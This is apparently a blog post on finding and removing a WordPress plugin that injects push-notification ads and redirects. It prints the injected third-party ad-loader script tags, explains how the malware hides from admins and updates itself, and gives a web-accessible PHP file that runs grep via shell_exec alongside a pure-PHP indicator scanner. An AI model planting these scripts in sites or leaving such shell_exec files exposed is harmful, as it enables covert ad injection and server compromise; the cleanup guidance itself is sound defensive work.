How to Fix Unauthorized Push Notification and Redirection Malware on WordPress

Are you running a website on WordPress and seeing a lot of unauthorized ads, some with explicit content, on your website? Are these ads also appearing as push notifications on mobile devices? Are you getting redirected to unknown webpages from your website's links? Then, my friend, you are a victim of a recently active malware that is being spread by anonymous sources. Today I am going to tell you how to fix unauthorized push notifications and redirection.

What does it look like?

Recently our website, Swarna, The Sagi Girl, also became a victim of this malware, and I had no clue what it was or how it was happening. For one month I ignored it, and it later became an embarrassing moment when one of my visitors told me about it. But two days ago, I was finally able to get hold of this malware and remove it completely from my server. Here's what this push notification looks like.

I wasn’t able to take screenshots from my desktop because the malware has a nice algorithm that hides it from admins: if you don’t take any steps in the initial days, you will never see these ads as an admin.
In the initial days, though, I inspected one of the push ads on my website. I feel lucky that I did, because after a few days it stopped showing up on my screen, as my IP had been logged in the helper file. Only visitors were able to see these ads. The inspected ads had code similar to Code Snippet 1. You might have different but broadly similar code, as this malware has spread under different names with slightly modified code and URLs.
Code Snippet 1:
<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3388587,document.body||document.documentElement)</script>
<script src="https://propu.sh/pfe/current/tag.min.js?z=3388595" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush.com/400/3388600" data-cfasync="false" async="async"></script>
Code Snippet 2:
<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3336627,document.body||document.documentElement)</script>
<script src="https://asoulrox.com/pfe/current/tag.min.js?z=3336643" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush.com/400/3336649" data-cfasync="false" async="async"></script>

How does this malware work?

As I said previously, it has a really nice and simple algorithm, written in around 400 lines of code in a single PHP file. As a whole, it is a standalone plugin that fetches organic ads from different search engines. At the same time, it hides itself from the admin dashboard and stores every IP address each admin has logged in from in a separate text file called admin_ips.txt.
This file helps the plugin identify whether the current visitor to your website is an admin or not. If the visitor is not an admin, it displays these ads and places redirections across your whole website. These ads are very embarrassing as well as very frustrating, as they contain articles related to money-making tricks or adult content. If not treated in the early days, the malware becomes very difficult to detect.
To make matters worse, it has an auto-update feature. It uses allow_url_fopen to update itself every time updated code is available. So you can understand how important it is that this malware be contained and removed from your servers before it can create more havoc.
The snippets above are only a few lines of the whole code, but they show how malicious it can be.

How to fix unauthorized push notification and redirection malware from WordPress?

If you are still able to see this ad on your desktop, right-click on it and use Inspect in any browser. In my case I use Mozilla Firefox, so it never showed in this browser as I was logged in as admin, but initially it did sometimes come up in Chrome. If it is no longer appearing but has appeared previously, you can use your mobile network or a VPN to visit your website. Try to see what JS script or code it has, like the ones I have provided above. Copy some part of the code; we will use this to search on the server.

In my case, I remembered “inpagepush.com”, so I searched my server for files containing this string. If you are using shared hosting, you might not have full SSH access and might not be able to search. To solve the search issue, create a PHP file (a file with the .php extension) with any name. I used find.php, put the code below in the file, and saved it in the public_html folder.

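<?php
// Search every file under this directory, recursively and case-insensitively.
$command = "grep -ri 'inpagepush' ./*";
$output = shell_exec($command);
// Escape the output: matching lines contain <script> tags, which the browser
// would otherwise load and run instead of displaying.
echo "<pre>" . htmlspecialchars((string) $output) . "</pre>";
echo "Grep job over.";
// Delete this file from the server once the search is finished.
?>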
In the above code you can replace inpagepush with the string you copied while inspecting the ad. To run this file, go to your browser and visit yourdomain/find.php. Don’t forget to replace yourdomain with your home page URL. The file searches through your files and folders recursively for any line containing the search string, and shows every match on the page. You will then be able to see the files containing this code/string along with their paths.
[Screenshot: Search File Result]
In my case it was ccode.php, present in the plugins folder along with admin_ips.txt. This is the file that was causing all this commotion. You can open it and go through its contents, or you can simply tell the file bye-bye and permanently delete it along with the admin_ips.txt file. In your case it might be present under some name other than ccode, and in multiple directories, so you need to make sure the files in all of those paths also get deleted.
Before deleting, please make sure you are deleting the correct files, not files that belong to any specific plugin or to the core files. Don’t forget to take a backup of your website and database before attempting this.
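The same search can be done without shell_exec, which shared hosts may disable, while reporting the matching line number and indicator for each file so you can review what you are about to delete. This is an added example, not code from the original post or from the malware; scan_tree, the 5 MB size cap and the demo directory are assumptions made for illustration.

```php
<?php
// Added example: pure-PHP search for hosts where shell_exec() is not available.
// Indicators: ad hosts from Code Snippets 1 and 2, plus the helper file name.
const INDICATORS = ['iclickcdn.com', 'propu.sh', 'asoulrox.com',
                    'inpagepush.com', 'admin_ips.txt'];
const MAX_BYTES = 5 * 1024 * 1024; // assumption: skip files larger than 5 MB

// Returns a list of [path, line number, indicator]; line 0 means a file-name match.
function scan_tree(string $root, array $indicators): array
{
    $hits = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::LEAVES_ONLY,
        RecursiveIteratorIterator::CATCH_GET_CHILD // skip unreadable directories
    );
    foreach ($files as $file) {
        $path = $file->getPathname();
        if (!$file->isFile() || !$file->isReadable() || realpath($path) === __FILE__) {
            continue; // not a regular readable file, or this scanner itself
        }
        if (strcasecmp($file->getFilename(), 'admin_ips.txt') === 0) {
            $hits[] = [$path, 0, 'admin_ips.txt (file name)'];
            continue;
        }
        if ($file->getSize() > MAX_BYTES) {
            continue;
        }
        $lines = file($path, FILE_IGNORE_NEW_LINES) ?: [];
        foreach ($lines as $n => $line) {
            foreach ($indicators as $needle) {
                if (stripos($line, $needle) !== false) {
                    $hits[] = [$path, $n + 1, $needle];
                }
            }
        }
    }
    return $hits;
}

// Constructed demo tree (harmless stand-ins, not the real malware files).
$demo = sys_get_temp_dir() . '/scan_demo_' . uniqid();
mkdir("$demo/plugins/fake", 0700, true);
file_put_contents("$demo/plugins/fake/ccode.php", "<?php\n// src=//inpagepush.com/400/0\n");
file_put_contents("$demo/plugins/fake/admin_ips.txt", "203.0.113.7\n");
file_put_contents("$demo/plugins/fake/readme.txt", "nothing to see\n");
foreach (scan_tree($demo, INDICATORS) as [$path, $line, $why]) {
    echo htmlspecialchars("$path:$line  $why"), "\n";
}
```

To scan a real site, replace the demo tree with a call to scan_tree(__DIR__, INDICATORS) from a file in public_html, and delete that file once you have the results.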
[Screenshot: Plugin Deleted]
Once you have deleted the files, you will be able to see a notification like this on your admin dashboard. It means we have deleted all the files this plugin needs to run, but it is still registered in the DB tables, so the WordPress engine is unable to run it. Good news for us!
Once you are done clearing these files from the search results, it’s time to clean your database as well. Open phpMyAdmin, enter the specific string in Search, and select all tables to search. It will show you all the tables where the malware has left footprints. In my case I used inpagepush and ccode to make sure my DB was cleaned.
[Screenshot: Search String “inpagepush”]
[Screenshot: Search String “ccode”]
As you can see, it affected many of my database tables. In your case it might be different, so try searching with all the possible keywords to find more. And that will be all. Oh! One more thing: don’t forget to clear your cache to vanquish the last bits of this malware on your website.

Also, for additional security you can block all the URLs present in the ads from sending and receiving requests. After this incident I also changed my database prefix.

Resources

Thanks to Astra for Code Snippet 2. You can also check out the page where they have mentioned more tips to fix unauthorized push notification and redirection malware. Thanks also to user Sri from Webmasters Stack Exchange for the code for searching in cPanel files. If you want to read more about WordPress security, I definitely recommend reading FAQ My site was hacked and Hardening WordPress.

I hope that, if you are a victim of this malware, this post about how to fix unauthorized push notification and redirection malware on WordPress helped you. Let us know your thoughts in the comments below.
